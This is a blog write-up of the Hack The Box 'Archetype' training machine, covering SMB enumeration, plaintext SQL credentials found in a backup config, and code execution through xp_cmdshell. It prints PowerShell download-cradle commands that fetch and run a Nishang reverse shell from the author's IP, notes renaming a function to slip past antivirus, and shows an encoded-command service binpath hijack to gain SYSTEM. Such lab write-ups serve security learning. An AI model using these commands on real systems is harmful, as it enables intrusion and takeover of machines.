SH∆FIQ∆IM∆N
SH∆FIQ∆IM∆N

Contents

HacktheBox - Archetype Writeup

SH∆FIQ ∆IM∆N included in HacktheBox Windows
   541 words   3 minutes 
/posts/htb/archetype/featured.png

Box author | egre55egre55

Enumeration

  • 1000 ports scan
1

nmap -sC -sV -oN nmap/initial 10.10.10.27

/posts/htb/archetype/1.png
initial nmap scan

  • all ports scan

/posts/htb/archetype/2.png
full nmap scan

Open ports

  • 135 (msrpc)
  • 139 (smb 4 sure)
  • 445 (smb 4 sure)
  • 1433 (ms-sql-s/Microsoft SQL Server)

SMB Enum

CrackMapEXEC

/posts/htb/archetype/3.png
crackmapexec

smbclient

/posts/htb/archetype/4.png
smbclient

wow backups shares. Let’s try connect to it.

/posts/htb/archetype/5.png
backup shares

  • download the file using the get command

prod.dtsConfig

  • content of the file
1
2
3
4
5
6
7
8

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

we’ve got the credentials

  • ARCHETYPE\sql_svc:M3g4c0rp123

Foothold/Gaining Access

mssqlclient.py[Impacket]

  • mssqlclient syntax
1

mssqlclient.py <UserID>@<IP addr> -windows-auth

/posts/htb/archetype/6.png
mssqlclient

  • always do this after login enable_xp_cmdshell
  • let’s try run whoami

/posts/htb/archetype/7.png
xp_cmdshell whoami

  • Note: I’m using xp_cmdshell then whoami

Nishang

Nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.
  • I’m gonna copy the Invoke-PowerShellTcp.ps1 into my www directory. Then, rename it to rev.ps1

/posts/htb/archetype/8.png
copy PowerShellTcp.ps1

  • Open the rev.ps1 file and pick one of the example. Then copy and paste it on the last line of the code.
Tip
Make sure! change the ip and port

/posts/htb/archetype/9.png
PowerShellTcp.ps1 example
examples

/posts/htb/archetype/10.png
modify PowerShellTcp.ps1

put in here and save it

  • Time to upload the script into the machine by using mssqlclient.py that we connected.
    • I’m gonna run python server inside www directory.
    • python3 -m http.server
    • Then try to uploaded using this command:
      • xp_cmdshell powershell IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.16.13:8000/rev.ps1\")
    • And this happen

/posts/htb/archetype/11.png
blocked by AV

it says this script got blocked by antivirus because of this function

  • So, I change the function into something else. It works.

/posts/htb/archetype/12.png
execute again

User flag

/posts/htb/archetype/14.png
user flag

WinPEAS

  • Upload the winpeas binary into the machine
  • I’m gonna use powershell to know this machine architecture
    • by using this command:
      • (wmic os get OSArchitecture)[2]

/posts/htb/archetype/13.png
check OSArchitecture

  • This machine is 64-bit. I’m gonna upload WinPEAS 64-bit version to work.

  • I’m gonna copy and paste the WinPEAS binary into my www folder.

  • Let’s upload it by using this command:

    • IWR http://10.10.16.13:8000/winPEASx64.exe -OutFile winpeas.exe

/posts/htb/archetype/15.png
download WinPEAS

  • Then run it by using this command .\winpeas.exe

Privilege Escalation

UsoSvc

  • WinPEAS just found this juicy stuff:

/posts/htb/archetype/16.png
UsoSVC modify services

Modify service binary path

  • According this link

If the group “Authenticated users” has SERVICE_ALL_ACCESS in a service, then it can modify the binary that is being executed by the service.

Encoded Command

  • Here is the script before Encoded
1

IEX(IWR http://10.10.16.13:8000/zzz.ps1 -UseBasicParsing)
  • Time to encoded
1

echo "IEX(IWR http://10.10.16.13:8000/zzz.ps1 -UseBasicParsing)" | iconv -t utf-16le | base64 -w 0
  • First, It’s gonna encoded into utf-16le
  • Second, It’s gonna encoded into base64
  • Sources IppSec
  • So, I’m gonna copy another powershell reverse shell by name it into zzz.ps1
  • Then upload it using this command:
1

sc.exe config UsoSvc binpath="cmd.exe /c powershell.exe -EncodedCommand SQBFAFgAKABJAFcAUgAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMQAzADoAOAAwADAAMAAvAHoAegB6AC4AcABzADEAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkACgA="
  • After that, run this command sc.exe start UsoSvc

/posts/htb/archetype/17.png
create a service

/posts/htb/archetype/18.png
catch the shell

we’ve got the reverse shell and become system!

Administrator Flag

/posts/htb/archetype/19.png
administrator flag

Conclusion

I’ve learned a lot of tools today and how to do a PowerShell reverse shell. Ngl, this is a really fun box. I feel like my brain want to explode

I have a fun time doing this machine and I hope you guys too. Bye ;)

Updated on 20-07-2021
 reverse-powershelllegacysmbsmbclientcrackmapexec-smbimpacket-mssqlclientmssqlxp_cmdshellnishangmodify-serviceswindows-check-OS-architecture
Back | Home